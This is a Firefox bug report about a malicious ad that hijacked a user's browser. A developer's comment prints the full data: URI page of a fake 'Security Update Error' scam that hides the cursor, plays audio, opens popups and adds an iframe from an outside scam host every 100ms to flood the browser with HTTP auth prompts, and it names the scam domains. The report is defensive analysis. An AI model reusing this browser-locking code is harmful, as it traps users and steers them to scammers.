1324226 - Browser Hijack using data URI and lots of http auth prompts

Status: RESOLVED DUPLICATE of bug 1312243

(Firefox :: Untriaged, defect)

Description

[Ken]

Attachment: recovery.js with hacked URL in it.

User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507

Steps to reproduce:

I was browsing the internet and an advertisement agency had this on it's server and it prevented me from actively using firefox.


Actual results:

The page displayed highly suspicious and deceptive content that effectively ignored even bypassed the ad-blocking add-on.


Expected results:

For my browser to not be taken over.

Comment 1

[:Gijs (he/him)]

Looks like you got redirected there through http://hat.topimagionredirect.xyz/?adv=888111 and then http://13x70488-virus.info/en/?id=KzEgKDg4OCkgOTk2LTE0NDY .

The data:text/html document that loads looks like this:

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Security Update Error 0xB9730637</title><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script><script type="text/javascript">$(document).ready(function(){animateDiv();});function makeNewPosition(){var h=$(window).height()-50,w=$(window).width()-50,nh=Math.floor(Math.random()*h),nw=Math.floor(Math.random()*w);return [nh,nw];}function animateDiv(){var newq=makeNewPosition(),oldq=$(".zzfszs").offset(),speed=calcSpeed([oldq.top,oldq.left],newq);$(".zzfszs").animate({top:newq[0],left:newq[1]},speed,function(){animateDiv();});};function calcSpeed(prev,next){var x=Math.abs(prev[1]-next[1]),y=Math.abs(prev[0]-next[0]),greatest=x>y?x:y,speedModifier = 0.3,speed=Math.ceil(greatest/speedModifier);return speed;}</script><style type="text/css">@media all and (-ms-high-contrast:none){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}@media screen and (-webkit-min-device-pixel-ratio:0){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}@-moz-document url-prefix(){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}body{background-color:#F40000;color:#000000;font-family:Arial;font-size:13px;margin:0;text-align:center;z-index:0;}#lataed{position:absolute;top:-100px;left:-9999px;z-index:0;}</style></head><body><div class="zzfszs"></div><div class="aykntn"><audio autoplay><source src="http://13x70488-virus.info/en/help.php?id=music" type="audio/mpeg"></audio><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAASUVORK5CYII=" onClick="window.open('http://13x70488-virus.info/en/?id=KzEgKDg4OCkgOTk2LTE0NDY','','height='+screen.availHeight+',width='+screen.availWidth);" style="position:absolute;top:0;left:0;border:0;height:100%;width:100%;z-index:101;">

<snip two massive data: URI images>

</div><script type="text/javascript">function ubrdid(){var i=document.createElement("div");i.innerHTML='<div id="lataed"><iframe src="http://13x70488-virus.info/en/report.php?id=KzEgKDg4OCkgOTk2LTE0NDY&lataed=xiefba"></iframe></div>';document.body.appendChild(i);}window.setInterval(function(){ubrdid()},100);</script><div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="http://13x70488-virus.info/about.php?q=vktrft"></iframe></div><div id="lataed"></div></body></html>"


which looks like it's basically just adding 1 iframe every 100ms to this document.

Comment 2

[:Gijs (he/him)]

Ah, so the frames that get added all prompt for http auth.

This recently got fixed in bug 1312243. Now, after 3 such prompts, we will suppress prompts on that site and you can easily close the tab. It looks like the fix should be out with Firefox 52, which is slated for release in early March next year.

It looks like the original redirect came from gamedev, so it's likely an ad loaded on that page, but I couldn't quickly reproduce the same redirect - it seems like it might be difficult to find the exact ad that triggered this unless you can easily reproduce this problem (in which case you can try tracing the ad with the network monitor devtools, if you're comfortable doing that).